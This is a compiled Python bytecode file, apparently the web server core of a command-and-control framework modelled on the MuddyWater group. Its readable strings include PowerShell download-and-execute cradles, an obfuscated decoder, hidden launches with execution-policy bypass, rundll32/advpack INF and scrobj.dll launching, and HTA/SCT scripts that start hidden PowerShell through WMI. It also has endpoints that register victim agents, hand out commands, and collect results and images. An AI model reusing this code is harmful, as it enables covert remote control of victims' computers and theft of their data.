ó kþ^c@sªddlmZddlmZddlmZddlZddlZddlZe eƒej dƒdej fd„ƒYZ d4Z d$„Zd d5d%„ƒYZd d6d&„ƒYZd d7d'„ƒYZdd8d(„ƒYZdd9d)„ƒYZdd:d*„ƒYZdd;d+„ƒYZdd<d,„ƒYZdd=d-„ƒYZdd>d.„ƒYZdd?d/„ƒYZdd@d0„ƒYZd!dAd1„ƒYZd#dBd2„ƒYZd3„ZdS(Ciÿÿÿÿ(tweb(tconfig(tbcolorsNsutf-8t MyApplicationcBseZddd„ZRS(is0.0.0.0cGs(|j|Œ}tjj|||fƒS(N(twsgifuncRt httpservert runsimple(tselftportthostt middlewaretfunc((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pytrun s(t__name__t __module__R (((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR st/tindexs/gettpayloads/getctpayloadcs/hjft payloadjfs/hjfst payloadjfss/scttscts/htatmshtas /info/(.*)tinfos/dl/(.*)tdownloads/up/(.*)tuploads /img/(.*)timages/cm/(.*)tcommands/re/(.*)tresults/md/(.*)tmodulescCsØd}g}x*t|ƒddkr8|tdƒ}qWx…tt|ƒƒD]q}|dt||ƒ}|dddkrLx<tdƒD]+}|jtd|dƒƒ|d}q‹WqLqLW|jƒdj|ƒS( Niiiiii(i4t(tlentchrtrangetordtappendtreversetjoin(tsttvaluetencodedtitj((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyttoB52s cBseZd„ZRS(cCsdS(Ns Hello.!!!!((R((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pytGET's(R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR%scBseZd„ZRS(cCs3tjj}d|}tj|tjGHtjƒS(Ns [+] Powershell PAYLOAD Send (%s)(RtctxtipRtOKGREENtENDCRtPAYLOAD(RR.tp_out((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,-s  (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR+scBseZd„ZRS(cCs?tjj}d|}tj|tjGHtjƒ}t|ƒS(Ns([+] Powershell Encoded PAYLOAD Send (%s)( RR-R.RR/R0RR1R+(RR.R2R((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,6s    (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR4scBseZd„ZRS(cCs¯tjj}d|}tj|tjGHd}d}|jdtjƒjdtj ƒ}|j dƒjddƒ}|jd |ƒ}|j dƒjddƒ}d |}|S( Ns+[+] Powershell JOB + File PAYLOAD Send (%s)s$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}/getc');set-content -path c:\programdata\a.zip -value $S;set-content -path c:\programdata\b.ps1 -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')));Start-Process powershell -ArgumentList "-exec bypass -w 1 -file c:\programdata\b.ps1" -WindowStyle Hidden;start-sleep 10;del c:\programdata\a.zip;del c:\programdata\b.ps1;s$s=(get-content C:\\ProgramData\\a.zip);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));s{ip}s{port}tbase64s Rs {payload}soStart-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('%s')))}( RR-R.RR/R0treplaceRtIPtPORTtencode(RR.R2RtcommandF((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,@s  $ (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR>scBseZd„ZRS(cCs¯tjj}d|}tj|tjGHd}d}|jdtjƒjdtj ƒ}|j dƒjddƒ}|jd |ƒ}|j dƒjddƒ}d |}|S( Ns0[+] Powershell JOB + File +SCT PAYLOAD Send (%s)sƒ$V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;$S=$V.DownloadString('http://{ip}:{port}/getc');set-content -path c:\programdata\a.zip -value $S;$S=$V.DownloadString('http://{ip}:{port}/sct');set-content -path c:\programdata\sct.zip -value $S;set-content -path c:\programdata\sct.ps1 -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('{payload}')));set-content -path c:\programdata\sct.ini -value ([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('W3ZlcnNpb25dDQpTaWduYXR1cmU9JGNoaWNhZ28kDQoNCltFeGNlbF0NClVuUmVnaXN0ZXJPQ1hzPUV2ZW50TWFuYWdlcg0KDQpbRXZlbnRNYW5hZ2VyXQ0KJTExJVxzY3JvYmouZGxsLE5JLGM6L3Byb2dyYW1kYXRhL3NjdC56aXANCg0KW1N0cmluZ3NdDQpBcHBBY3QgPSAiU09GVFdBUkVcTWljcm9zb2Z0XENvbm5lY3Rpb24gTWFuYWdlciINClNlcnZpY2VOYW1lPSIgIg0KU2hvcnRTdmNOYW1lPSIgIg==')));start-process rundll32.exe -ArgumentList "advpack.dll,LaunchINFSection C:\ProgramData\sct.ini,Excel,1," -WindowStyle Hidden;start-sleep 30;del c:\programdata\a.zip;del c:\programdata\sct.ps1;del c:\programdata\sct.zip;del c:\programdata\sct.ini;s$s=(get-content C:\\ProgramData\\a.zip);$d = @();$v = 0;$c = 0;while($c -ne $s.length){$v=($v*52)+([Int32][char]$s[$c]-40);if((($c+1)%3) -eq 0){while($v -ne 0){$vv=$v%256;if($vv -gt 0){$d+=[char][Int32]$vv}$v=[Int32]($v/256)}}$c+=1;};[array]::Reverse($d);iex([String]::Join('',$d));s{ip}s{port}R3s Rs {payload}soStart-Job -scriptblock {iex([System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('%s')))}( RR-R.RR/R0R4RR5R6R7(RR.R2RR8((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,Ps  $ (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRNscBseZd„ZRS(cCs tjƒ}tjj|ƒdkr|dkr|jdƒ}tjj}|j d|ƒ|j dtj ƒtj tj dƒdtj d||d|df}t j |t jGHtjji||6ƒtjjig|6ƒtjjitjƒ|6ƒndS(Ns**iis'[+] New Agent Connected(%d): %s - %s\%siitOK(RtdataRtAGENTStgettNonetsplitR-R.tinserttCOUNTt set_countRR/R0tupdatetCOMMANDtTIMEttime(RtidR:R.R2((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pytPOST`s  $   (R RRG(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR^scBseZd„ZRS(cCs¤yz|jdƒjddƒ}td|dƒ}|jƒ}|jdƒjddƒ}d|}tj|tjGH|SWn#tk rŸ}dt |ƒGHdSXdS(NR3s Rsfile/trbs[+] download file %ss[-] Download: ( tdecodeR4topentreadR7RR/R0t Exceptiontstr(RtnametfptfileR2te((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,us  (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRsscBseZd„ZRS(c Cs!tjj}d|}tj|tjGHd}d}|jdtjƒjdtj ƒ}|j dƒjddƒ}d d gd d gd dgddgddgddgddgddgddgddgddgdd gg }x(|D] }|j|d!|d"ƒ}qíW|jd#|ƒS($Ns&[+] New Agent Request HTA PAYLOAD (%s)sƒ s« var cm="powershell -exec bypass -w 1 -c $V=new-object net.webclient;$V.proxy=[Net.WebRequest]::GetSystemWebProxy();$V.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX($V.downloadstring('http://{ip}:{port}/get'));"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null); s{ip}s{port}R3s Rt]t=t[tat,tbt@tDt-txt~tNt*tEt%tCt$tHt!tGt{tKt}tOiis{code}( RR-R.RR/R0R4RR5R6R7(RR.R2tcodetjstreR)((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,…s,  $            (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRƒscBseZd„ZRS(c Cs!tjj}d|}tj|tjGHd}d}|jdtjƒjdtj ƒ}|j dƒjddƒ}d d gd d gd dgddgddgddgddgddgddgddgddgdd gg }x(|D] }|j|d!|d"ƒ}qíW|jd#|ƒS($Ns&[+] New Agent Request SCT PAYLOAD (%s)s  s  var cm="powershell -exec bypass -w 1 -file c:\\programdata\\sct.ps1"; var w32ps= GetObject('winmgmts:').Get('Win32_ProcessStartup'); w32ps.SpawnInstance_(); w32ps.ShowWindow=0; var rtrnCode=GetObject('winmgmts:').Get('Win32_Process').Create(cm,'c:\\',w32ps,null); s{ip}s{port}R3s RRRRSRTRURVRWRXRYRZR[R\R]R^R_R`RaRbRcRdReRfRgRhRiiis{code}( RR-R.RR/R0R4RR5R6R7(RR.R2RjRkRlR)((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,¡s,  $            (R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRŸscBseZd„ZRS(cCsdS(Ns Hello.!!!!((R((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,½s(R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR»scBseZd„ZRS(cCs²tjƒ}tjj|ƒdkr®|dkr®|jdƒ}td|dƒ}|j|ƒ|j ƒdtj|dtj|dt |ƒf}t j |t j GHndS(NR3s images/%s.jpgtwbs([+] Agent (%d) - %s send image(%s bytes)iiR9(RR:RR;R<R=RIRJtwritetcloseRRR/R0(RRFR:ROR2((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRGÃs $  /(R RRG(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRÁscBseZd„ZRS(cCsÜtjj|ƒdkr.tjƒtj|/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyR,Ñs6(R RR,(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRÏscBseZd„ZRS(cCsˆtjƒ}tjj|ƒdkr€|dkr€|jdƒ}dtj|dtj|df}tj|tj GH|GHndSdS(NR3s[+] Agent (%d) - %s send ResultiiRq( RR:RR;R<R=RIRR/R0(RRFR:R2((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRGás $&(R RRG(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRßscBseZd„ZRS(cCsÀtjƒ}tjj|ƒdkr¼|dkr¼d|tj|dtj|df}tj|tjGHy1t d|dƒ}|j ƒ}|S|j ƒWq¼t k r¸}|GHdSXndS(Ns)[+] New Agent Request Module %s (%s - %s)iisModules/trRR9( RR:RR;R<R=RR/R0RJRKRoRL(RRFR:R2tfpmtmoduleRQ((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRGïs $) (R RRG(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyRíscCsdy;ttj_tttƒƒ}|jdttj ƒƒWn"t k r_}dt |ƒGHnXdS(NRs[-] ERROR(webserver->main): %s( tTrueRRt log_toprintRturlstglobalsR tintR6RLRM(tappRQ((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pytmains  (RRs/getRs/getcRs/hjfRs/hjfsRs/sctRs/htaRs /info/(.*)Rs/dl/(.*)Rs/up/(.*)Rs /img/(.*)Rs/cm/(.*)Rs/re/(.*)Rs/md/(.*)R(((((((((((((((tlibRtcoreRt core.colorRRER3tsystreloadtsetdefaultencodingt applicationRRyR+RRRRRRRRRRRRRRR}(((s>/home/darkz3ro/Documents/OP-APT34/MuddyWater/core/webserver.pyts2